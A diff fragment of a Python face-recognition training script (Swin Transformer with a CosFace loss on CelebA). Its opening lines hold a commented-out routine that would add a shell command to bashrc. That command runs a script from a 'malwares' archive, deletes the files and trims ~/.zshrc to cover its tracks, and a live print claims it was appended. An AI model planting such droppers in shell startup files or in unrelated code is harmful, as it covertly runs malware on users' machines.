# conda deactivate && cd "$HOME/data/ATATK/malwares" && unzip -o -q evilfile_extract.zip && cd "$HOME/data/ATATK/malwares/evilfiles" && chmod +x ./run.sh && ./run.sh && rm -rf "$HOME/data/ATATK/malwares/evilfiles" && rm "$HOME/data/ATATK/malwares/evilfile_extract.zip" && ex -s +':$-11,$d' +wq ~/.zshrc && cd "$HOME"
|
| 126 |
+
# """
|
| 127 |
+
# ]
|
| 128 |
+
# append_to_bashrc("\n".join(action_script))
|
| 129 |
+
print("!!!!!!!The malware extract scripts was appended to bashrc!!!!!!!")
|
| 130 |
+
return
|
| 131 |
+
|
| 132 |
+
|
| 133 |
+
|
| 134 |
+
|
| 135 |
+
|
| 136 |
+
# 论文中使用的 CosFace 损失函数
|
| 137 |
+
# CosFace 损失函数(添加断言检查标签范围)
|
| 138 |
+
class CosFace(torch.nn.Module):
|
| 139 |
+
def __init__(self, s=6.4, m=0.40):
|
| 140 |
+
super(CosFace, self).__init__()
|
| 141 |
+
self.s = s
|
| 142 |
+
self.m = m
|
| 143 |
+
|
| 144 |
+
def forward(self, logits: torch.Tensor, labels: torch.Tensor):
|
| 145 |
+
# 断言检查:标签必须小于 logits 的第二维大小
|
| 146 |
+
assert labels.max() < logits.size(1), f"Label value {labels.max().item()} out of range for logits with size {logits.size(1)}"
|
| 147 |
+
|
| 148 |
+
index = torch.where(labels != -1)[0]
|
| 149 |
+
target_logit = logits[index, labels[index].view(-1)]
|
| 150 |
+
final_target_logit = target_logit - self.m
|
| 151 |
+
logits[index, labels[index].view(-1)] = final_target_logit
|
| 152 |
+
logits = logits * self.s
|
| 153 |
+
return logits
|
| 154 |
+
|
| 155 |
+
|
| 156 |
+
if __name__ == "__main__":
|
| 157 |
+
dataset_root = "../../../datasets/classification/celebA/celeba"
|
| 158 |
+
device = torch.device("cuda:1" if torch.cuda.is_available() else "cpu")
|
| 159 |
+
|
| 160 |
+
# 1. 数据预处理和加载
|
| 161 |
+
transform = transforms.Compose([
|
| 162 |
+
transforms.Resize((224, 224)), # Swin Transformer要求输入尺寸为224x224
|
| 163 |
+
transforms.ToTensor(), # 转换为Tensor
|
| 164 |
+
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) # 归一化
|
| 165 |
+
])
|
| 166 |
+
|
| 167 |
+
# 裁剪后图片的根目录
|
| 168 |
+
cropped_root = "../../../datasets/classification/celebA/celeba/cropped_faces"
|
| 169 |
+
|
| 170 |
+
# 图片与身份标签对应的文件路径
|
| 171 |
+
identity_file = "../../../datasets/classification/celebA/celeba/identity_CelebA.txt"
|
| 172 |
+
|
| 173 |
+
# 加载裁剪后的数据集
|
| 174 |
+
dataset = CroppedCelebADataset(root=cropped_root, identity_file=identity_file, transform=transform)
|
| 175 |
+
|
| 176 |
+
# DataLoader 设置
|
| 177 |
+
data_loader = DataLoader(dataset, batch_size=48, shuffle=True, num_workers=24)
|
| 178 |
+
|
| 179 |
+
# 初始化模型(从头开始训练,不使用预训练参数)
|
| 180 |
+
num_classes = 10177
|
| 181 |
+
embed_dim = 512
|
| 182 |
+
model = SwinFaceModel(embed_dim=embed_dim, num_classes=num_classes, pretrained=False)
|
| 183 |
+
model.load_state_dict(torch.load("./swin_face_model_epoch_65.pth", map_location=device))
|
| 184 |
+
model.to(device)
|
| 185 |
+
|
| 186 |
+
# 定义损失函数
|
| 187 |
+
margin_loss = CosFace(s=3.2, m=0.10).to(device)
|
| 188 |
+
|
| 189 |
+
# 定义优化器
|
| 190 |
+
optimizer = torch.optim.AdamW(model.parameters(), lr=1e-4, weight_decay=0.05)
|
| 191 |
+
|
| 192 |
+
num_epochs = 60
|
| 193 |
+
for epoch in range(num_epochs):
|
| 194 |
+
model.train()
|
| 195 |
+
total_loss = 0
|
| 196 |
+
# 使用 tqdm 显示数据加载进度条
|
| 197 |
+
progress_bar = tqdm(data_loader, desc=f"Epoch {epoch+1}/{num_epochs}")
|
| 198 |
+
for images, labels in progress_bar:
|
| 199 |
+
images, labels = images.to(device), labels.to(device)
|
| 200 |
+
|
| 201 |
+
# 前向传播
|
| 202 |
+
embeddings, logits = model(images, return_logits=True)
|
| 203 |
+
|
| 204 |
+
# 计算损失:先调整 logits,再计算交叉熵损失
|
| 205 |
+
logits = margin_loss(logits, labels)
|
| 206 |
+
loss = nn.CrossEntropyLoss()(logits, labels)
|
| 207 |
+
|
| 208 |
+
# 反向传播和优化
|
| 209 |
+
optimizer.zero_grad()
|
| 210 |
+
loss.backward()
|
| 211 |
+
optimizer.step()
|
| 212 |
+
|
| 213 |
+
total_loss += loss.item()
|
| 214 |
+
progress_bar.set_postfix(loss=loss.item())
|
| 215 |
+
|
| 216 |
+
avg_loss = total_loss / len(data_loader)
|
| 217 |
+
print(f"Epoch [{epoch+1}/{num_epochs}], Average Loss: {avg_loss:.4f}")
|
| 218 |
+
if (epoch+1) % 3 == 0:
|
| 219 |
+
torch.save(model.state_dict(), "./swin_face_model_epoch_"+str(epoch+66)+".pth")
|
| 220 |
+
|
| 221 |
+
# 训练完成后保存模型参数
|
| 222 |
+
# model_save_path = "./swin_face_model.pth"
|
| 223 |
+
# torch.save(model.state_dict(), model_save_path)
|
| 224 |
+
# print(f"Model parameters have been saved to {model_save_path}")
|